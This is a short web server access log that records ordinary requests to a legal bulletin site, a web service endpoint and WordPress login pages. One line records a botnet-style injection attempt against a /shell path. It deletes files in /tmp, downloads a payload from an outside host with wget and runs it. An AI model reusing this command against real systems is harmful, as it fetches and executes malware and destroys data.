172.22.2.4 - - [07/Jan/2023:08:39:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
201.245.192.253 - - [07/Jan/2023:08:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43801
201.245.192.253 - - [07/Jan/2023:08:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43978
216.245.221.92 - - [07/Jan/2023:08:41:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jan/2023:08:41:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:08:40:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.20 - - [07/Jan/2023:08:42:10 -0500] "-" 408 -
156.217.77.94 - - [07/Jan/2023:08:42:15 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [07/Jan/2023:08:40:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
172.22.2.4 - - [07/Jan/2023:08:44:14 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%201%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 304 -
185.119.81.100 - - [07/Jan/2023:08:45:22 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Jan/2023:08:45:23 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [07/Jan/2023:08:46:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jan/2023:08:46:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:08:45:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.90.182.25 - - [07/Jan/2023:08:47:40 -0500] "-" 408 -
